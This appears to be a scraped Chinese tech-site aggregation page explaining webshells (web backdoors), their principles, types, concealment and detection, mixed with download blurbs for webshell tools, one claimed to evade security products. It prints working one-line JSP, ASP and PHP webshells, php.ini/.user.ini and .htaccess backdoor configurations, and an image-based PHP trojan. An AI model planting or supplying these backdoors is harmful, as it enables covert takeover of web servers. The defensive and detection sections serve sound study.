精华内容
下载资源
问答
  • 2021-03-03 15:25:51

    1、什么是webshell

        webshell是web入侵的脚本攻击工具。

        简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。

        为了更好理解webshell我们学习两个概念:

        什么是“木马”?

        “木马”全称是“特洛伊木马(Trojan<BR>Horse)”,原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市的故事。

        在Internet上,“特洛伊木马”指一些程序设计人员在其可从网络上下载 (Download)的应用程序或游戏中,包含了可以控制用户的计算机系统的程序,可能造成用户的系统被破坏甚至瘫痪。

        什么是后门?

        大家都知道,一台计算机上有65535个端口,那么如果把计算机看作是一间屋子,那么这65535个端口就可以它看做是计算机为了与外界连接所开的65535 扇门。每个门的背后都是一个服务。有的门是主人特地打开迎接客人的(提供服务),有的门是主人为了出去访问客人而开设的(访问远程服务)——理论上,剩下的其他门都该是关闭着的,但偏偏由于各种原因,很多门都是开启的。于是就有好事者进入,主人的隐私被刺探,生活被打扰,甚至屋里的东西也被搞得一片狼迹。这扇悄然被开启的门——就是“后门”。

        webshell的优点

        webshell 最大的优点就是可以穿越防火墙,由于与被控制的服务器或远程主机交换的数据都是通过80端口传递的,因此不会被防火墙拦截。并且使用webshell一般不会在系统日志中留下记录,只会在网站的web日志中留下一些数据提交记录,没有经验的管理员是很难看出入侵痕迹的。

    2、webshell的原理

    ①可执行脚本 

    HTTP数据包($_GET、$_POST、$_COOKIES、$_SERVER[args]等)

    ②数据传递

    ③执行传递的数据 

    a.直接执行(eval、system、passthru等) 

    b.文件包含执行(include、require等) 

    c.动态函数执行($a="phpinfo";$a();) 

    d.Curly Syntax执行(${‘ls’}) 

    e.preg_replace(第一个参数存在’/e’) 

    f.ob_start函数 

    g.回调函数(array_map等) 

    h.反序列化(unserialize等)

     

    3、webshell的分类

    ①根据文件大小分类:大马和小马(通常指的是一句话木马,能够使用菜刀这类工具去直接连接它) 
    ②根据脚本名称分类:jsp、asp、aspx、php 

    jsp的简单的webshell:

    1

    <%Runtime.getRuntime().exec(request.getParameter("i"));%>

    asp的简单的webshell:

    1

    success!!!!<%eval request("cmd")%>

    php的简单的webshell:

    1

    2

    3

    4

    <?php

        $a=exec($_GET["input"]);    

        echo $a;

    ?>

     

    4、webshell的常见类型

    ①php.ini隐藏后门

    1

    2

    auto_prepend_file="/tmp/caidao.php"

    auto_append_file="/tmp/caidao.php"

    这两种都是相当于在php脚本头部include。 
    注:auto_prepend_file 与 auto_append_file 只能require一个php文件,但在这个php文件内可以require多个其他的php文件。 

    ②.htaccess构成php后门

    1

    2

    3

    4

    5

    <FilesMatch "abc.jpg">//上传特定的文件只把它解析成为php

     

    SetHandler application/x-httpd-php

     

    </FilesMatch>

    1

    2

    3

    4

    5

    php_flag engine

    AddHandler(AddHander php5-script .logs)

    AddType application/x-httpd-php .png

    SetHandler(<FilesMatch “_php.gif”>SetHandler application/x-httpd-php</FilesMatch>)

    php_value auto_append_file /tmp/caidao.php

    ③user.ini隐藏后门(不需重启)

    除了主php.ini之外,PHP还会在每个目录下扫描ini文件,从被执行的PHP文件所在目录开始一直上升到web根目录($_SERVER[‘DOCUMENT_ROOT’] 所指定的)。如果被执行的PHP文件在web根目录之外,则只扫描该目录。利用方式与php.ini相似。

    1

    2

    auto_prepend_file="/tmp/caidao.php"  相当于在php脚本头部include

    auto_append_file="/tmp/caidao.php"   相当于在php脚本底部include

    ④PHP代码开启标志缩写

    将php.ini的short_open_tag参数设为On

    1

    <?=($_=@$_GET[2]).@$_($_GET[1])?>

    ⑤图片木马

    1

    2

    3

    4

    <?php

        $wp__theme_icon=create_function('',file_get_contents('hacker.gif'));    

        $wp__theme_icon();

    ?>

    注:这种方法不允许图片中有非法数据。

        只有了解了webshell的特点,才能已最小的代价高效的做好web防御。

    更多相关内容
  • 上个版本不能,这个支持21.3的openwrt系统。 更新方法 1.安装 ipk文件。opkg install *ipk 2.传输webshell.lua,到机器的目录/usr/lib/lua/luci/controller,替换旧文件 3.重启路由器。 注:必须重启路由,需要替换...
  • webshell

    2021-03-29 16:38:38
    关于 简单webshel​​l实现。 安装 yarn install 建造 确保先安装。 从这个仓库的根源: yarn build 开始开发模式 确保先安装 从这个仓库的根源: yarn start ... 在docker目录中,运行docker-compose up 。...
  • webshell管理工具天蝎,是由冰蝎变种,可以绕过各种检测设备。
  • 最新的PHP WEBshell大马

    2021-01-13 11:50:02
    最新的WEBshell大马,亲测可用,若侵权,请联系CSDN管理员删除
  • wso_webshell_php_

    2021-10-01 01:27:02
    Webshell
  • 一款好用的linux下的webshell查杀软件。linux下的webshell查杀工具很少,所以这里分享出来。用于发现服务器上的web后门 官方网站地址:https://www.shellpub.com
  • 声明:本PHP-webshell仅供学习交流以及网站安全检测之,功能过于强大,请不要过非法用途,否则一切后果由使用者本人承担! 使用方法:上传至网站任意目录连接即可。无需更改任何。(自测功能完整,无任何阉割,...
  • webshell反弹技术

    2021-01-05 20:38:11
    webshell反弹技术
  • 多功能Webshell密码爆破器
  • 一个ASP.Net下的WebShell,主要完成cmd命令。一般的服务器设置,asp.net用户的权限都比较高。如果asp的webshell无法执行,可能asp.net的可以执行。
  • 最近几个月中,参加过很多webshell检测的比赛,我们内部的,也其他厂商的,平心而论,TSRC和 青藤云针对webshell|文件的检测思路和实现成熟度是业界领先的,使用动静态污点分析webshell文件,已经是非常高级的...
  • webshell什么

    千次阅读 2021-04-13 11:16:12
    webshell什么? 百度百科的定义:webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB...

    webshell是什么?

    百度百科的定义:webshell就是以aspphp、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。

    通俗来讲,Webshell是黑客经常使用的一种恶意脚本,其目的是获得对服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。黑客通常利用常见的漏洞,如SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分,最终达到控制网站服务器的目的。

    webshell的特点

    黑客使用Webshell的第一步通常是将其上传到可以访问的服务器中,例如利用用户CMS系统的第三方插件中的漏洞上传一个简单的php Webshell。当然,Webshell类型和作用也不完全相同,一些简单的Webshell只起到连接外界的作用,允许黑客插入更加精准的恶意脚本,执行他们所需要的指令;另外一些则可能更加复杂,带有数据库或文件浏览器,让黑客能够从数千英里之外的地方查看入侵系统的代码和数据。无论何种设计,Webshell都极其危险,是网络罪犯和高级持续威胁(APTs)的常用工具。Webshell常见的攻击特点主要有以下几点:

    持久化远程访问

    Webshell脚本通常会包含后门,黑客上传Webshell之后,就可以充分利用Webshell的后门实现远程访问并控制服务器,从而达到长期控制网站服务器的目的。此外,在上传完Webshell之后,黑客会选择自己修复漏洞,以确保没有其他人会利用该漏洞。通过这种方式,黑客就可以一种低调的姿态,避免与管理员进行任何交互,同时仍然获得相同的结果。

    提权

    在服务器没有配置错误的情况下,Webshell将在web服务器的用户权限下运行,而用户权限是有限的。通过Webshell,黑客可以利用系统上的本地漏洞来实现权限提升,从而获得Root权限,这样黑客基本上可以在系统上做任何事情,包括安装软件、更改权限、添加和删除用户、窃取密码、阅读电子邮件等等。

    隐蔽性极强

    Webshell可以嵌套在正常网页中运行,且不容易被查杀。它还可以穿越服务器防火墙,由于与被控制的服务器或远程主机交互的数据都是通过80端口传递,因此不会被防火墙拦截,在没有记录流量的情况下,Webshell使用post包发送,也不会被记录在系统日志中,只会在Web日志中记录一些数据提交的记录。

    如何隐藏Webshell

    Webshell几乎适用于所有Web编程语言,尤其以PHP居多。

    修改报头

    黑客使用用户代理字符串而不是通过$_POST 请求参数来传递命令的。

    <?php system($_SERVER['HTTP_USER_AGENT'])?

    然后黑客可以通过将命令放在user-agent http包头中来制作特定的http请求。
    在这里插入图片描述
    在服务器日志中可以看到这一行为的效果,其中第二个请求中的HTTP User-Agent被cat /etc/passwd命令替换了。

    隐藏在正常文件中

    黑客用来隐藏Webshell最简单的一个方法是将它们上传到深层子目录中和/或使用随机名称。

    此外,一种更有效的方法是将Webshell代码嵌入到现有的合法文件中。

    注意:黑客通常会在函数前使用@运算符,以防发生任何错误,写入错误日志。

    混淆

    黑客使用各种混淆技术,以避免被管理员检测到。他们不断提出新的更复杂的方法来隐藏其代码并绕过安全系统。下面是我们看到的一些最常用的技术。

    (1)删除空格换行符

    通过从代码块中删除空格换行符,代码看起来像一个大字符串,这就使得代码的可读性降低并且更难识别脚本要实现什么目的。

    (2)加密技术

    该技术可以对代码进行加密,降低代码的可读性,并且充分利用运行时可以重建代码的各种函数。

    (3)使用Hex进行混淆

    ASCII字符的十六进制值也可以用于进一步混淆Webshell命令,下面的例子可以很好地说明混淆技术在Webshell中的应用。

    (4)通过可控输入实现混淆

    PHP常用的可控输入包括: $_GET, $_POST, R E Q U E S T , _REQUEST, REQUEST,_FILES,$_SERVER $_COOKIE等,是PHP预定义的变量,可以将黑客自定义的值传递给浏览器中。

    Webshell检测和预防

    检测

    如果管理员怀疑其系统中存在Webshell或只是进行例行检查,则需要检查以下内容。

    首先,必须针对Webshell正在使用的常见关键字过滤服务器访问和错误日志,包括文件名称和/或参数名称。必须在文件系统(通常是Web服务器根目录)中搜索文件或文件名中的通用字符串。

    监视网络中存在异常的网络流量和连接。

    通常,黑客会利用Web服务器软件中存在的漏洞来安装Webshell。因此,消除这些漏洞对于避免失陷Web服务器的潜在风险很重要。以下是一些与Webshell相关的预防措施。

    如果不使用,要禁用危险的PHP函数,例如exec()、shell_exec()、passthru()、system()、show_source()、proc_open()、pcntl_exec()、eval()与assert()。

    如果必须要启用这些命令,请确保未授权用户无法访问这些脚本。此外,使用escapeshellarg()和escapeshellcmd()可以确保不能将用户输入注入到shell命令中,从而导致命令执行漏洞。

    如果Web应用程序正在使用上传表单,请确保上传的表单是安全的,并且仅允许上传白名单所允许的文件类型。

    不要相信用户输入的信息。

    不要盲目使用在线论坛或网站上的代码。

    对于WordPress,如果不需要,要避免安装第三方插件。如果需要使用插件,请确保插接件其信誉良好且经常更新。

    在敏感目录(如图片或上传)中禁用PHP执行。

    锁定Web服务器用户权限。

    上面给出的是一些简单的Webshell检测和预防措施。面对较为复杂的Webshell攻击,则需要采用一些专业的Webshell检测工具来实现了。

    参加文献

    1,https://www.freebuf.com/articles/web/235651.html

    2,https://zhuanlan.zhihu.com/p/344629093

    展开全文
  • nginx虚拟主机防webshell完美版,使用nginx的朋友可以参考下。
  • 中国蚁剑,免费拿走,自己踩过的坑,不想别人再踩
  • webshell实际上是网页后门,本质上是一种网页文件,一般由asp,php,jsp,asp.net 等语言开发 顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作命令。 使用方法...

    webshell实际上是网页后门,本质上是一种网页文件,一般由asp,php,jsp,asp.net 等语言开发

    顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作命令。

    使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。

    正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的
    webshell是什么意思

    想要系统快速的学习网络安全技术可以关(加)注(我)攻重(即可)号,白帽黑客训练营,里面有惊喜哦

    webshell有哪几种种类?

    我们在做web渗透的时候经常用到webshell,常见的webshell有小马,大马,一句话木马

    小马的功能通常是围绕文件管理的功能,比较简单,如:文件上传、文件修改、新建文件等,都是围绕方便上传一个体量大的木马来做的。

    大马的功能比较齐全,有几个木马大家可能都用过,像:phpSpy、jspSpy 以及 aspxSpy等

    一句话木马

    自从菜刀出现之后,渐渐的一句话木马成为了主流,体量小,

    还有一个界面版的客户端进行管理操作,极大的方便的大家对于 web 服务器的管理,

    随后由于菜刀不再更新,慢慢的出现了很多类似的变种,

    像:c刀,蚁剑,菜刀,Hatchet,xise,QuasiBot,

    WeBaCoo,Weevely、k8飞刀等,其核心功能包含文件管理、命令执行其实就够用了。
    什么是webshell
    webshell有什么作用?

    一方面,webshell被站长常常用于网站管理、服务器管理等等,

    根据FSO权限的不同,作用有在线编辑网页脚本、上传下载文件、

    查看数据库、执行任意程序命令等。

    另一方面,被入侵者利用,从而达到控制网站服务器的目的。
    webshell有什么作用
    webshell常见检测方式:

    静态检测:通过匹配特征码、特征值、危险函数来查找webshell,

    但只能查找已知的webshell。主流的检测方法有关键字检查(Keywords Matching)、

    审核代码逻辑(Code Logic Review)等。

    动态检测:webshell在执行时表现出来的特征,我们称为动态特征。

    主流的检测方法有文件状态对比(File Info Comparison)、

    运行特征(Feature Matching)、访问行为检测(Access Behavior)等

    在这里插入图片描述

    展开全文
  • webshell v2.0 仅供学习 请勿用作非法用途 更新了部分规则,现在可以绕过包括但不仅限于D盾、webdir+、河马、安全狗等查杀工具 项目适配了asp、aspx、php语言 免杀webshell生成工具 知识点:使用注释分隔eval函数内...
  • 小弟才疏学浅如内容上的问题还请不吝指正。近年来网站被植入后门等隐蔽性攻击呈逐年增长态势,国家互联网应急中心发布的《2013年我国互联网网络安全态势综述》称2013年国家互联网应急中心共监测发现我国境内6.1万...
  • WebShell根据其功能和大小可以分为多种类型,各种类型的WebShell在基本特征上又其独有的特征,而现有的WebShell检测大多从单一层面提取特征,无法较全面的覆盖各种类型WebShell全部特征,具有种类偏向性,无差别的...
  • WebShell技术分享.ppt

    2021-06-10 10:30:51
    1、WebShell基础概念 2、WebShell查杀与反查杀 3、工具演示
  • webshell-bypassed-human 见公众号文章: ,或者见 fb 文章 过人 webshell 的生成工具 » python hide_webshell.py [!] usage: python hidden_webshell.py payload filename [output_filename] [-] example: ...
  • NULL 博文链接:https://lindows.iteye.com/blog/1076021
  • php大马 webshell.zip

    2020-03-05 11:01:52
    webshell,可以拿站,不过一定要清除痕迹 ,不然不要做非法用途。否则后果自负。
  • 什么Webshell

    千次阅读 2020-10-13 20:38:45
    一、什么Webshell? 顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于...

    一、什么是Webshell?

    顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。

    webshell就是以aspphp、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。

    shell是一个人机交互页面,能操控服务器并获取权限。Shell文件有个变态的地方,就是可从服务器那边接收数据并执行、返回结果,也就是说只要把 shell 文件上传到目标服务器,就能操控服务器了。

    二、webshell的分类

    webshell根据脚本可以分为PHP脚本木马,ASP脚本木马,也有基于.NET的脚本木马和JSP脚本木马。根据时代和技术的变迁,国外也有用python编写的脚本木马,不过国内常用的无外乎三种:大马小马一句话木马,具体使用场景和特地如下图:

    三、Webshell的作用

    一方面,webshell被站长常常用于网站管理、服务器管理等等,根据FSO权限的不同,作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等。

    另一方面,被入侵者利用,从而达到控制网站服务器的目的。这些网页脚本常称为WEB脚本木马,比较流行的aspphp木马,也有基于.NET的脚本木马与JSP脚本木马。

    四、Webshell的隐蔽性

    WebShell后门具有隐蔽性,一般隐藏在正常文件中并修改文件时间达到隐蔽的,还有利用服务器漏洞进行隐藏,如 "..." 目录就可以达到,站长从FTP中找到的是含有“..”的文件夹,而且没有权限删除,还有一些隐藏的WEBSHELL,可以隐藏于正常文件带参数运行脚本后门。

    webshell可以穿越服务器防火墙,由于与被控制的服务器或远程过80端口传递的,因此不会被防火墙拦截。并且使用webshell一般不会在系统日志中留下记录,只会在网站的web日志中留下一些数据提交记录,没有经验的管理员是很难看出入侵痕迹的。

    五、如何防范Webshell 渗透?

    从根本上解决动态网页脚本的安全问题,要做到防注入、防爆库、防COOKIES欺骗、防跨站攻击(xss)等等,务必配置好服务器FSO权限。最小的权限等于最大的安全。

    最有效方法就是:可写目录不给执行权限,有执行权限的目录不给写权限。

    具体的防范方法(以asp为例子):

    1、建议用户通过ftp来上传、维护网页,尽量不安装asp的上传程序。

    2、对asp上传程序的调用一定要进行身份认证,并只允许信任的人使用上传程序。

    3、asp程序管理员的用户名和密码要有一定复杂性,不能过于简单,还要注意定期更换。

    4、到正规网站下载程序,下载后要对数据库名称和存放路径进行修改,数据库名称要有一定复杂性。

    5、要尽量保持程序是最新版本。

    6、不要在网页上加注后台管理程序登陆页面的链接。

    7、为防止程序有未知漏洞,可以在维护后删除后台管理程序的登陆页面,下次维护时再通过上传即可。

    8、要时常备份数据库等重要文件。

    9、日常要多维护,并注意空间中是否有来历不明的asp文件。

    10、尽量关闭网站搜索功能,利用外部搜索工具,以防爆出数据。

    11、利用白名单上传文件,不在白名单内的一律禁止上传,上传目录权限遵循最小权限原则。

    12、使用防篡改系统工具,或者使用软件监控网站目录文件的操作日志,一发现异常马上处理。

    展开全文
  • 乘风webshell工具

    2021-07-14 15:14:48
    乘风webshell工具,过市场上所有的waf,至今没发现被杀的!
  • webshell渗透测试软件

    2021-08-10 10:23:21
    网络安全与数据恢复相关工具,渗透测试软件
  • 本文讲述了一个python查找 webshell脚本的代码,除了查找webshell功能之外还具有白名单功能,以及发现恶意代码发送邮件报警等功能,感兴趣的朋友可以自己测试一下看看效果。 具体的功能代码如下: #!/usr/bin/env ...
  • WebShell

    千次阅读 2020-12-11 17:08:35
    WebShell 解释 在计算机科学中,Shell 俗称壳(用来区别“核”),是指“为使用者提供操作界面”的软件(命令解释器)。类似于windows 系统给的cmd.exe 或者Linux 下bash/sh 等,虽然这些系统的命令解释器不止一...
  • Webshell介绍

    千次阅读 2020-10-07 12:26:41
    Webshell介绍1.1任务描述1.2 训练目标1.3 Webshell简介1.4 常见Webshell上传方式1.4.1 解析漏洞上传(1)IIS目录解析漏洞(2)文件解析漏洞(3)文件名解析(4)fast-CGI解析漏洞(5)Apache解析漏洞1.4.2 截断上传1.4.3 后台...
  • 本文所讲述之设置方法与环境:适用于Microsoft Windows 2000 Server/Win2003 SERVERIIS5.0/IIS6.0。

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 24,794
精华内容 9,917
关键字:

webshell有什么用